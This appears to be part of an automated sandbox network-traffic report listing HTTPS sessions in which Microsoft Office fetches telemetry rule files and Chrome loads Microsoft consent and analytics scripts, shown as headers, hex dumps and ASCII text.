                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            60192.168.2.54978913.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:32 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:32 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                                                                            x-ms-request-id: 6a120a4b-401e-0078-724b-2e4d34000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133932Z-15869dbbcc6kg5mvhC1DFWgs2s00000001cg00000000b783
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:32 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            61192.168.2.54978713.107.253.454433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:32 UTC551OUTGET /mscc/lib/v2/wcp-consent.js HTTP/1.1
                                                                                                                                                                                                                            Host: wcpstatic.microsoft.com
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                            Sec-Fetch-Site: same-site
                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                            Referer: https://learn.microsoft.com/
                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                            2024-11-06 13:39:32 UTC713INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:32 GMT
                                                                                                                                                                                                                            Content-Type: application/javascript
                                                                                                                                                                                                                            Content-Length: 52717
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                            Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                                            Age: 15803
                                                                                                                                                                                                                            Cache-Control: max-age=43200
                                                                                                                                                                                                                            Content-MD5: QT/MdZzBmCG2G2lBgIsptQ==
                                                                                                                                                                                                                            Etag: 0x8DA85F6F74C6D08
                                                                                                                                                                                                                            Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                                            x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                            x-ms-lease-status: unlocked
                                                                                                                                                                                                                            x-ms-request-id: f1255b38-901e-0056-632c-303130000000
                                                                                                                                                                                                                            x-ms-version: 2009-09-19
                                                                                                                                                                                                                            x-azure-ref: 20241106T133932Z-158dbd74bf4tx46ghC1SN1t6pc00000005ng0000000008kc
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:32 UTC16384INData Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 74 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                                                                            Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e
                                                                                                                                                                                                                            2024-11-06 13:39:32 UTC16382INData Raw: 2d 6c 61 62 65 6c 3d 22 27 2b 69 2e 65 73 63 61 70 65 48 74 6d 6c 28 74 68 69 73 2e 74 65 78 74 52 65 73 6f 75 72 63 65 73 2e 70 72 65 66 65 72 65 6e 63 65 73 44 69 61 6c 6f 67 43 6c 6f 73 65 4c 61 62 65 6c 29 2b 27 22 20 63 6c 61 73 73 3d 22 27 2b 61 2e 63 6c 6f 73 65 4d 6f 64 61 6c 49 63 6f 6e 2b 27 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 3e 26 23 78 32 37 31 35 3b 3c 2f 62 75 74 74 6f 6e 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 72 6f 6c 65 3d 22 64 6f 63 75 6d 65 6e 74 22 20 63 6c 61 73 73 3d 22 27 2b 61 2e 6d 6f 64 61 6c 42 6f 64 79 2b 27 22 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 27 2b 61 2e 6d 6f 64
                                                                                                                                                                                                                            Data Ascii: -label="'+i.escapeHtml(this.textResources.preferencesDialogCloseLabel)+'" class="'+a.closeModalIcon+'" tabindex="0">&#x2715;</button>\n <div role="document" class="'+a.modalBody+'">\n <div>\n <h1 class="'+a.mod
                                                                                                                                                                                                                            2024-11-06 13:39:32 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 7d 2c 65 7d 28 29 2c 64 3d 5b 22 61 72 22 2c 22 68 65 22 2c 22 70 73 22 2c 22 75 72 22 2c 22 66 61 22 2c 22 70 61 22 2c 22 73 64 22 2c 22 74 6b 22 2c 22 75 67 22 2c 22 79 69 22 2c 22 73 79 72 22 2c 22 6b 73 2d 61 72 61 62 22 5d 2c 75 3d 7b 22 63 6c 6f 73 65 2d 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 22 3a 22 23 36 36 36 36 36 36 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 6f 70 61 63 69 74 79 22 3a 22 31 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f
                                                                                                                                                                                                                            Data Ascii: background-color: "+e["radio-button-disabled-color"]+" !important;\n }"},e}(),d=["ar","he","ps","ur","fa","pa","sd","tk","ug","yi","syr","ks-arab"],u={"close-button-color":"#666666","secondary-button-disabled-opacity":"1","secondary-butto
                                                                                                                                                                                                                            2024-11-06 13:39:32 UTC3567INData Raw: 28 22 2d 22 29 5b 30 5d 3b 6f 3d 65 2e 73 70 6c 69 74 28 22 2d 22 29 5b 30 5d 3d 3d 3d 6e 7d 72 65 74 75 72 6e 20 6f 7d 28 65 2c 63 29 7d 29 29 3b 73 26 26 30 3d 3d 3d 73 2e 6c 65 6e 67 74 68 26 26 28 65 3d 22 65 6e 2d 55 53 22 29 2c 6f 2e 70 6c 61 63 65 68 6f 6c 64 65 72 45 6c 65 6d 65 6e 74 3d 6c 2c 72 26 26 6f 2e 63 6f 6e 73 65 6e 74 43 68 61 6e 67 65 64 43 61 6c 6c 62 61 63 6b 73 2e 72 65 67 69 73 74 65 72 43 61 6c 6c 62 61 63 6b 28 72 29 2c 6f 2e 73 61 76 65 43 6f 6f 6b 69 65 28 29 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 3d 6e 65 77 20 66 28 21 31 29 2c 6e 75 6c 6c 3d 3d 6e 7c 7c 6e 28 76 6f 69 64 20 30 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 29 2c 6f 2e 69 73 49 6e 69 74 52 65 61 64 79 3d 21 30 2c 74 68 69 73 2e 63 6f 6e 73 65 6e 74 43 68 61 6e
                                                                                                                                                                                                                            Data Ascii: ("-")[0];o=e.split("-")[0]===n}return o}(e,c)}));s&&0===s.length&&(e="en-US"),o.placeholderElement=l,r&&o.consentChangedCallbacks.registerCallback(r),o.saveCookie(),o.siteConsent=new f(!1),null==n||n(void 0,o.siteConsent),o.isInitReady=!0,this.consentChan


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            62192.168.2.54978813.107.246.454433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:32 UTC549OUTGET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                                                                                                                                                            Host: js.monitor.azure.com
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                            Referer: https://learn.microsoft.com/
                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                            2024-11-06 13:39:32 UTC891INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:32 GMT
                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                            Content-Length: 207935
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                                                                                                                                                            Last-Modified: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                                                                            ETag: 0x8DCEC757C1AD1D1
                                                                                                                                                                                                                            x-ms-request-id: b909e3ec-f01e-00d4-7c8f-269d10000000
                                                                                                                                                                                                                            x-ms-version: 2009-09-19
                                                                                                                                                                                                                            x-ms-meta-jssdkver: 4.3.3
                                                                                                                                                                                                                            x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.3.min.js
                                                                                                                                                                                                                            Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                            x-azure-ref: 20241106T133932Z-16547b76f7f7jnp2hC1DFWfc3000000006r000000000c0ek
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:32 UTC15493INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 4c 4c 20 53 4b 55 2c 20 34 2e 33 2e 33 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 21 3d 6e 29 74 28 65 78 70 6f 72 74 73 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69
                                                                                                                                                                                                                            Data Ascii: /*! * 1DS JSLL SKU, 4.3.3 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&defi
                                                                                                                                                                                                                            2024-11-06 13:39:32 UTC16384INData Raw: 3f 6e 28 69 29 3a 28 72 3d 66 65 28 22 63 6f 6e 73 6f 6c 65 22 29 29 26 26 28 72 2e 65 72 72 6f 72 7c 7c 72 2e 6c 6f 67 29 28 74 2c 63 65 28 69 29 29 29 29 7d 53 65 28 61 3d 7b 74 68 65 6e 3a 6f 2c 22 63 61 74 63 68 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 28 75 6e 64 65 66 69 6e 65 64 2c 65 29 7d 2c 22 66 69 6e 61 6c 6c 79 22 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2c 6e 3d 74 3b 72 65 74 75 72 6e 20 51 28 74 29 26 26 28 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 26 26 74 28 29 2c 65 7d 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 74 26 26 74 28 29 2c 65 7d 29 2c 6f 28 65 2c 6e 29 7d 7d 2c 22 73 74 61 74 65 22 2c 7b 67 65 74 3a 64 7d 29 2c 68 74 28 29 26 26 28 61 5b 6d
                                                                                                                                                                                                                            Data Ascii: ?n(i):(r=fe("console"))&&(r.error||r.log)(t,ce(i))))}Se(a={then:o,"catch":function(e){return o(undefined,e)},"finally":function(t){var e=t,n=t;return Q(t)&&(e=function(e){return t&&t(),e},n=function(e){throw t&&t(),e}),o(e,n)}},"state",{get:d}),ht()&&(a[m
                                                                                                                                                                                                                            2024-11-06 13:39:32 UTC16384INData Raw: 67 63 28 65 2c 74 2c 6e 2c 72 29 7b 67 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 65 5b 74 5d 26 26 28 6e 3f 28 6e 2e 63 62 5b 74 65 5d 28 7b 66 6e 3a 72 2c 61 72 67 3a 65 7d 29 2c 6e 2e 68 3d 6e 2e 68 7c 7c 6e 6e 28 70 63 2c 30 2c 6e 29 29 3a 4d 28 72 2c 5b 65 5d 29 29 7d 29 7d 68 63 2e 5f 5f 69 65 44 79 6e 3d 31 3b 76 61 72 20 76 63 3d 68 63 3b 66 75 6e 63 74 69 6f 6e 20 68 63 28 65 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 3d 5b 5d 3b 76 61 72 20 6e 2c 69 3d 5b 5d 2c 61 3d 7b 68 3a 6e 75 6c 6c 2c 63 62 3a 5b 5d 7d 2c 6f 3d 76 6f 28 65 2c 64 63 29 5b 4b 6e 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 3d 21 21 65 2e 63 66 67 2e 70 65 72 66 45 76 74 73 53 65 6e 64 41 6c 6c 7d 29 3b 76 65 28 68 63 2c 74 68 69 73 2c 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                            Data Ascii: gc(e,t,n,r){ge(e,function(e){e&&e[t]&&(n?(n.cb[te]({fn:r,arg:e}),n.h=n.h||nn(pc,0,n)):M(r,[e]))})}hc.__ieDyn=1;var vc=hc;function hc(e){this.listeners=[];var n,i=[],a={h:null,cb:[]},o=vo(e,dc)[Kn](function(e){n=!!e.cfg.perfEvtsSendAll});ve(hc,this,functio
                                                                                                                                                                                                                            2024-11-06 13:39:32 UTC16384INData Raw: 2c 6d 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 2e 66 6c 75 73 68 43 6f 6d 70 6c 65 74 65 3d 65 2c 50 3d 21 30 2c 52 2e 72 75 6e 28 6f 2c 61 29 2c 66 5b 67 72 5d 28 29 2c 6f 5b 6c 72 5d 28 61 29 7d 2c 36 2c 6e 29 2c 69 7d 2c 66 5b 6f 72 5d 3d 73 2c 66 2e 61 64 64 50 6c 75 67 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 6f 75 29 3b 76 61 72 20 69 3d 73 28 65 5b 24 6e 5d 29 3b 69 66 28 69 26 26 21 74 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 22 50 6c 75 67 69 6e 20 5b 22 2b 65 5b 24 6e 5d 2b 22 5d 20 69 73 20 61 6c 72 65 61 64 79 20 6c 6f 61 64 65 64 21 22 29 3b 76 61 72 20 61 2c 6f 3d 7b 72 65 61 73 6f 6e 3a 31 36 7d
                                                                                                                                                                                                                            Data Ascii: ,m(e,function(e){a.flushComplete=e,P=!0,R.run(o,a),f[gr](),o[lr](a)},6,n),i},f[or]=s,f.addPlugin=function(e,t,n,r){if(!e)return r&&r(!1),void C(ou);var i=s(e[$n]);if(i&&!t)return r&&r(!1),void C("Plugin ["+e[$n]+"] is already loaded!");var a,o={reason:16}
                                                                                                                                                                                                                            2024-11-06 13:39:32 UTC16384INData Raw: 6d 61 6c 3a 31 2c 43 72 69 74 69 63 61 6c 3a 32 7d 29 2c 75 6e 64 65 66 69 6e 65 64 2c 75 6e 64 65 66 69 6e 65 64 29 2c 53 6c 3d 22 22 3b 66 75 6e 63 74 69 6f 6e 20 78 6c 28 65 29 7b 74 72 79 7b 69 66 28 6f 65 28 6f 74 28 29 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 74 3d 28 6e 65 77 20 44 61 74 65 29 5b 4f 73 5d 28 29 2c 6e 3d 66 65 28 65 3d 3d 3d 45 6c 2e 4c 6f 63 61 6c 53 74 6f 72 61 67 65 3f 22 6c 6f 63 61 6c 53 74 6f 72 61 67 65 22 3a 22 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 22 29 2c 72 3d 53 6c 2b 74 2c 69 3d 28 6e 2e 73 65 74 49 74 65 6d 28 72 2c 74 29 2c 6e 2e 67 65 74 49 74 65 6d 28 72 29 21 3d 3d 74 29 3b 69 66 28 6e 5b 52 73 5d 28 72 29 2c 21 69 29 72 65 74 75 72 6e 20 6e 7d 63 61 74 63 68 28 61 29 7b 7d 72 65 74 75 72 6e 20 6e
                                                                                                                                                                                                                            Data Ascii: mal:1,Critical:2}),undefined,undefined),Sl="";function xl(e){try{if(oe(ot()))return null;var t=(new Date)[Os](),n=fe(e===El.LocalStorage?"localStorage":"sessionStorage"),r=Sl+t,i=(n.setItem(r,t),n.getItem(r)!==t);if(n[Rs](r),!i)return n}catch(a){}return n
                                                                                                                                                                                                                            2024-11-06 13:39:32 UTC16384INData Raw: 75 74 6f 20 74 72 61 63 6b 20 70 61 67 65 20 76 69 73 69 74 20 74 69 6d 65 20 66 61 69 6c 65 64 2c 20 6d 65 74 72 69 63 20 77 69 6c 6c 20 6e 6f 74 20 62 65 20 63 6f 6c 6c 65 63 74 65 64 3a 20 22 2b 63 65 28 72 29 29 7d 7d 2c 59 28 65 2c 22 5f 6c 6f 67 67 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 59 28 65 2c 22 70 61 67 65 56 69 73 69 74 54 69 6d 65 54 72 61 63 6b 69 6e 67 48 61 6e 64 6c 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 7d 29 7d 76 61 72 20 4e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 5b 67 64 5d 3d 50 74 28 29 2c 74 68 69 73 2e 70 61 67 65 4e 61 6d 65 3d 65 2c 74 68 69 73 2e 70 61 67 65 55 72 6c 3d 74 7d 2c 44 64 3d 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                            Data Ascii: uto track page visit time failed, metric will not be collected: "+ce(r))}},Y(e,"_logger",{g:function(){return o}}),Y(e,"pageVisitTimeTrackingHandler",{g:function(){return c}})})}var Nd=function(e,t){this[gd]=Pt(),this.pageName=e,this.pageUrl=t},Dd=functio
                                                                                                                                                                                                                            2024-11-06 13:39:32 UTC16384INData Raw: 67 2e 63 6f 72 65 44 61 74 61 2c 22 62 65 68 61 76 69 6f 72 22 29 2c 75 65 28 6e 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 6e 2e 70 61 67 65 54 79 70 65 29 2c 75 65 28 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 26 26 21 75 65 28 65 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 2c 75 65 28 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 26 26 28 65 2e 6d 61 72 6b 65 74 3d 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 2c 65 2e 69 73 4c 6f 67 67 65 64 49 6e 3d 47 64 28 72 2e 5f 63 6f 6e 66 69 67 29 2c 74 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 3d 6f 63 28 29 7d 2c 69 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73 65 74 50 61 67
                                                                                                                                                                                                                            Data Ascii: g.coreData,"behavior"),ue(n.pageType)&&(e.pageType=n.pageType),ue(r._pageTypeMetaTag)&&!ue(e.pageType)&&(e.pageType=r._pageTypeMetaTag),ue(r._marketMetaTag)&&(e.market=r._marketMetaTag),e.isLoggedIn=Gd(r._config),t.cookieEnabled=oc()},ip.prototype._setPag
                                                                                                                                                                                                                            2024-11-06 13:39:32 UTC16384INData Raw: 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 57 69 74 68 44 61 74 61 42 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 62 69 2d 22 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 22 64 61 74 61 2d 6d 22 3d 3d 3d 74 5b 6e 5d 2e 6e
                                                                                                                                                                                                                            Data Ascii: urn!0;return!1},Ap.prototype._isTrackedWithDataBi=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if(~t[n].name.indexOf("data-bi-"))return!0;return!1},Ap.prototype._isTracked=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if("data-m"===t[n].n
                                                                                                                                                                                                                            2024-11-06 13:39:32 UTC16384INData Raw: 62 41 75 74 68 54 6f 6b 65 6e 22 2c 61 3d 22 41 75 74 68 58 54 6f 6b 65 6e 22 2c 67 67 3d 22 6d 73 66 70 63 22 2c 76 67 3d 22 75 73 65 72 22 2c 68 67 3d 22 61 6c 6c 6f 77 52 65 71 75 65 73 74 53 65 6e 64 69 6e 67 22 2c 6d 67 3d 22 66 69 72 73 74 52 65 71 75 65 73 74 53 65 6e 74 22 2c 79 67 3d 22 73 68 6f 75 6c 64 41 64 64 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 73 22 2c 43 67 3d 22 67 65 74 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 56 61 6c 75 65 22 2c 62 67 3d 22 73 65 74 43 6c 6f 63 6b 53 6b 65 77 22 2c 79 65 3d 22 6c 65 6e 67 74 68 22 2c 54 67 3d 22 63 6f 6e 63 61 74 22 2c 49 67 3d 22 69 4b 65 79 22 2c 45 67 3d 22 63 6f 75 6e 74 22 2c 5f 67 3d 22 65 76 65 6e 74 73 22 2c 53 67 3d 22 70 75 73 68 22 2c 78 67 3d 22 73 70 6c 69 74 22 2c 4e 67 3d 22
                                                                                                                                                                                                                            Data Ascii: bAuthToken",a="AuthXToken",gg="msfpc",vg="user",hg="allowRequestSending",mg="firstRequestSent",yg="shouldAddClockSkewHeaders",Cg="getClockSkewHeaderValue",bg="setClockSkew",ye="length",Tg="concat",Ig="iKey",Eg="count",_g="events",Sg="push",xg="split",Ng="
